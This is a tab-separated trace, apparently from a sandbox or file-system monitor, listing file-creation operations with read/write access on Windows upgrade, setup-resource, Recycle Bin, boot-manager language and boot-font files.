Create	\Windows10Upgrade\upgrader_win10.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\upgrader_default.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\PostOOBEScript.cmd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\HttpHelper.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\GetCurrentRollback.EXE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\GetCurrentOOBE.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\GetCurrentDeploy.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\GatherOSState.EXE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\esdstub.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\ESDHelper.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\EnableWiFiTracing.cmd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\DWTRIG20.EXE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\DWDCW20.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\DW20.EXE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\downloader.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\DevInv.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\cosquery.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\Configuration.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\bootsect.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\appraiserxp.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\Logs\PartnerSetupCompleteResult.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\SetupComplete.cmd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\preoobe.cmd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\PartnerSetupComplete.cmd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\GetCurrentRollback.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\GetCurrentOOBE.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$Recycle.Bin\S-1-5-18\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1025\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1025\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1025\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1028\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1028\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1028\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1029\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1029\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1029\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1030\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1030\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1030\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1031\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1031\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1031\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1032\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1032\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1032\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1033\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1033\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1033\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1035\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1035\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1035\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1036\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1036\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1036\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1037\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1037\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1037\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1038\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1038\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1038\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1040\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1040\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1040\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1041\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1041\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1041\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1042\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1042\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1042\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1043\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1043\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1043\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1044\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1044\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1044\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1045\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1045\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1045\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1046\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1046\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1046\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1049\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1049\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1049\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1053\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1053\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1053\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1055\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1055\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1055\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2052\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2052\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2052\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2070\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2070\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2070\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3076\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3076\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3076\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3082\SetupResources.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3082\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3082\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Client\UiInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Client\Parameterinfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Extended\UiInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Extended\Parameterinfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\warn.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\SysReqNotMet.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\SysReqMet.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\stop.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Setup.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Save.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate8.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate7.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate6.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate5.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate4.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate3.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate2.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Rotate1.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\Print.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\bg-BG\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\cs-CZ\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\cs-CZ\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\da-DK\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\da-DK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\de-DE\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\de-DE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\el-GR\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\el-GR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\en-GB\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\en-US\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\en-US\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\es-ES\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\es-ES\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\es-MX\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\et-EE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fi-FI\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fi-FI\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\wgl4_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\segoe_slboot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\segoen_slboot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\segmono_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\msyh_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\msyhn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\msjh_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\msjhn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\meiryo_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\meiryon_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\malgun_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\malgunn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\kor_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\jpn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\cht_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\chs_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fr-CA\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fr-FR\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fr-FR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\hr-HR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\hu-HU\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\hu-HU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\it-IT\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\it-IT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ja-JP\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ja-JP\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ko-KR\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ko-KR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\lt-LT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\lv-LV\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nb-NO\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nb-NO\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nl-NL\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nl-NL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pl-PL\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pl-PL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pt-BR\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
